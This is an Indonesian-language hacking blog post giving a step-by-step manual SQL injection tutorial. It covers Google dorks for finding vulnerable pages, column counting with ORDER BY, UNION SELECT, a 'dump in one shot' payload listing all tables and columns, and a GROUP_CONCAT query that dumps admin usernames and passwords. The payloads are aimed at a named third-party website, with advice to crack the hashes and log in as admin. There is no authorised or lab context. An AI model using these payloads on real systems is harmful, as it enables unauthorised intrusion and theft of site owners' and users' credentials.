-->
Home

Cara Manual Sql Injection With Dios

Gatra
Gatra 3 comments
 
                 Palembang Cyber Team


 <<Teknik manual sql injection with dios>>

Oke sedikit materi dri aku..
Mungkin materi ini sdah sering kalean denger dimna"
Tp Buat yg blom bza..
Gx ada salahnya kita belajar.. buat yg udh plo minggir dlu ea

Alat n  bahan:
1.pc/hp
2.koneksi internet, nebeng wifi jg oke. Awokwkwk
3.kesabaran

Step by step:
1. Paling pertama dorking cuk..

Dork:
-inurl:index.php?id=
-inurl:trainers.php?id=
-inurl:buy.php?category=
-inurl:article.php?ID=
-inurl:lay_old.php?id=

Dst..

>> Cari  web yg vuln..

 Untuk Mengetahui Vuln Atau Tidak kalean Hanya Perlu Masukan tanda ( ' ) di belakang angka Id nya, Contoh :

http://www.ilslbd.com/content.php?Id=4'

Nah spt itu deh, maka muncul You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

jika sudah ketemu ,kalean tinggal masukan +order+by+1--+- ,Jadinya :

http://www.ilslbd.com/content.php?Id=4'+order+by+1--+-

Kalean terusin sampe nemu error ea..
http://www.ilslbd.com/content.php?Id=4'+order+by+2--+-
Ga error

http://www.ilslbd.com/content.php?Id=4'+order+by+3--+-
Ga error

http://www.ilslbd.com/content.php?Id=4'+order+by+4--+-
Error

Nah.. saya nemu error di nomor 4.
 Disini bza diketahui bahwa Table nya ada 3(angka sebelum error), Jika Sudah Gitu kalean Tinggal ganti +order+by dengan +union+select,jangan lupa di kasih tanda (-) di depan angka id.

http://www.ilslbd.com/content.php?Id=-4'+union+select+1,2,3--+-

Dan booom!!! Kluar tuh angka togel
Gua disini dpet angka togel 3
Ok. Sekarang gua masukin injectnya.
Inject:
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
Jadi,

http://www.ilslbd.com/content.php?Id=-4'+union+select+1,2, (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)--+-

Nah Disini Kalian Akan Lihat Banyak Table Table, Carilah Table Yang ada username dan password nya.

Klo udah nemu..
Tinggal kalean dump.
Caranya Dengan Masukan Inject:
/*!50000(SELECT+GROUP_CONCAT(username,0x3a,password+SEPARATOR+0x3c62723e)+FROM+utenti)*/

Disini user dan password gua di Table admin dan nama columnnya UserName dan Password. Jadi gua edit inject nya jadi

/*!50000(SELECT+GROUP_CONCAT([UserName],0x3a,[Password]+SEPARATOR+0x3c62723e)+FROM+[admin])*/

Nb: ganti tanda [] dg table yg lu temu cuk..

http://www.ilslbd.com/content.php?Id=-4'+union+select+1,2, /*!50000(SELECT+GROUP_CONCAT([UserName],0x3a,[Password]+SEPARATOR+0x3c62723e)+FROM+[admin])*/--+-

Stelah nemu.. hash pw di hashkiller.co.uk
Dan cari admin login. Done!


                           -==Gatra==-

Baca juga

3 comments

Post a Comment